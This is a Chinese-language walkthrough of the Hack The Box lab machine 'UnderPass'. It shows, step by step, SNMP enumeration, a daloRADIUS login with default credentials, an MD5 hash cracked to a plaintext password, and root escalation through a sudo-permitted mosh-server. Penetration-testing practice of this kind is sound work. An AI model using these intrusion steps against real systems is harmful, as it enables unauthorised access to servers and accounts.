UnderPass

created: "2025-08-04 23:16"
tags:
  - HTB
  - daloradius
  - SNMP
  - Mosh
title: UnderPass
OS: Linux
difficulty:
  - Easy
datePublished: 2024-11-21
image: attachments/Pasted image 20250804231700.png
author:
  - dakkmaddy
comment: 
aliases: 
score: 8.1
scoreStar: 
favorite: false
updated: "2025-08-05 00:31"

Pasted image 20250804231700.png

1. 立足点&User

1.1. 信息收集

1.1.1. 端口扫描

┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# nmap 10.10.11.48 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-04 17:50 EDT
Warning: 10.10.11.48 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.48
Host is up (0.083s latency).
Not shown: 64039 closed tcp ports (reset), 1494 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 23.74 seconds

┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# nmap 10.10.11.48 -p 22,80 -sCV       
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-04 17:51 EDT
Nmap scan report for 10.10.11.48
Host is up (0.054s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
|_  256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.24 seconds

1.1.2. 目录扫描

┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# dirsearch -u http://10.10.11.48/ -x 403 404 
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/Desktop/htb/Administrator/reports/http_10.10.11.48/__25-08-04_17-52-59.txt

Target: http://10.10.11.48/

[17:52:59] Starting: 

Task Completed

1.1.3. web

apache标准目录
Pasted image 20250804232348.png

1.1.4. UDP161 SNMP

对于这种扫目录没结果、且没有显示域名的。一般有三种方式可以进行下去

扫描UDP端口
爆破SSH
tcpdump抓包
我们先扫描UDP 发现它开放了SNMP服务

┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# nmap 10.10.11.48 -sU --top-ports 50
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-04 17:54 EDT
Nmap scan report for underpass.htb (10.10.11.48)
Host is up (0.065s latency).
Not shown: 48 closed udp ports (port-unreach)
PORT     STATE         SERVICE
161/udp  open          snmp
1812/udp open|filtered radius

你可以参考这里来利用SNMP

┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# snmpbulkwalk -c public -v2c 10.10.11.48 . 
Created directory: /var/lib/snmp/cert_indexes
iso.3.6.1.2.1.1.1.0 = STRING: "Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (111118) 0:18:31.18
iso.3.6.1.2.1.1.4.0 = STRING: "steve@underpass.htb"
iso.3.6.1.2.1.1.5.0 = STRING: "UnDerPass.htb is the only daloradius server in the basin!"
iso.3.6.1.2.1.1.6.0 = STRING: "Nevada, U.S.A. but not Vegas"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (112195) 0:18:41.95
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E9 08 04 0F 0C 1A 00 2B 00 00 
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-5.15.0-126-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro net.ifnames=0 biosdevname=0
"
iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 222
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0
iso.3.6.1.2.1.25.1.7.0 = No more variables left in this MIB View (It is past the end of the MIB tree)

可以获取到一个用户 steve@underpass.htb
还有一句话 UnDerPass.htb is the only daloradius server in the basin! 告诉我们daloradius 是一个服务器

1.2. daloradius

我们udp扫描结果显示 radius 是可能开放的服务

RADIUS（远程身份验证拨号用户服务）是一种网络访问协议，主要由 ISP 使用。它支持身份验证、授权和计费。用户凭据由 RADIUS 服务器验证，可能包括网络地址验证以增强安全性。身份验证后，用户获得网络访问权限，其会话详细信息会被跟踪以用于计费和统计目的。

我尝试去搜索daloradius，
你可以找到他的仓库地址： https://github.com/lirantal/daloradius
Pasted image 20250804234844.png
介绍说它是一个web服务，

那我们可以尝试爆破这个路径看看，这一次就有结果了

┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# dirsearch -u 10.10.11.48/daloradius -x 404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/Desktop/htb/Administrator/reports/_10.10.11.48/_daloradius_25-08-04_18-17-11.txt

Target: http://10.10.11.48/

[18:17:11] Starting: daloradius/
[18:17:16] 200 -  221B  - /daloradius/.gitignore
[18:17:33] 301 -  319B  - /daloradius/app  ->  http://10.10.11.48/daloradius/app/
[18:17:45] 301 -  319B  - /daloradius/doc  ->  http://10.10.11.48/daloradius/doc/
[18:17:45] 200 -    2KB - /daloradius/docker-compose.yml
[18:17:45] 200 -    2KB - /daloradius/Dockerfile
[18:17:47] 200 -   24KB - /daloradius/ChangeLog
[18:17:54] 301 -  323B  - /daloradius/library  ->  http://10.10.11.48/daloradius/library/
[18:17:55] 200 -   18KB - /daloradius/LICENSE
[18:18:08] 200 -   10KB - /daloradius/README.md
[18:18:10] 301 -  321B  - /daloradius/setup  ->  http://10.10.11.48/daloradius/setup/

Task Completed

我看了下 /daloradius/README.md，发现就是这个github项目
Pasted image 20250804235427.png

然后你根据这个项目的源代码，很容易就可以找到对应的 login.php
这里有两个登录接口
Pasted image 20250804235907.png

Pasted image 20250804235547.png

然后你可以在谷歌搜索到他的默认账号密码
Pasted image 20250804235958.png

经过测试可以在 /operators/login.php 这个接口处登录成功
Pasted image 20250805000049.png

然后可以看到有一个用户和他的密码
Pasted image 20250805000125.png

看一下密码位数

┌──(root㉿kali)-[~/Desktop/htb/Administrator]
└─# echo -n '412DD4759978ACFCC81DEAB01B382403' |wc -c      
32

应该是个md5
Pasted image 20250805000239.png

得到明文密码：underwaterfriends

1.3. ssh

Pasted image 20250805000332.png

2. root

2.1. sudo-Mosh

#svcMosh@underpass:~$ sudo -l
Matching Defaults entries for svcMosh on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User svcMosh may run the following commands on localhost:
    `(ALL) NOPASSWD: /usr/bin/mosh-server`

检测后发现可以运行 mosh-server

/usr/bin/mosh-server 是 Mosh (Mobile Shell) 的服务端组件

Mosh (Mobile Shell) 是一个用于远程终端连接的工具，类似于 SSH，但它更适合不稳定的网络环境（如无线网络、漫游网络），因为它支持：

网络断线重连。

延迟补偿（输入响应比 SSH 更流畅）。

使用 UDP 协议进行数据传输。

这里有点卡注了，参考 0xdf的文章提权

首先使用 sudo mosh-server 开一个服务端

#svcMosh@underpass:~$ sudo mosh-server 


`MOSH CONNECT 60001 TWwWy575M4MURCjSnWNPmw`

mosh-server (mosh 1.3.2) [build mosh 1.3.2]
Copyright 2012 Keith Winstein <mosh-devel@mit.edu>
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

[mosh-server detached, pid = 1740]

60001 是开放的端口
TWwWy575M4MURCjSnWNPmw 是密钥

然后使用 mosh-client 进行连接

#svcMosh@underpass:~$ mosh-client 127.0.0.1 60001
MOSH_KEY environment variable not found.

会提示 MOSH_KEY 没有在环境变量中

我们只要设置一下 MOSH_KEY 即可成功连接到本地

export MOSH_KEY=TWwWy575M4MURCjSnWNPmw
mosh-client 127.0.0.1 60001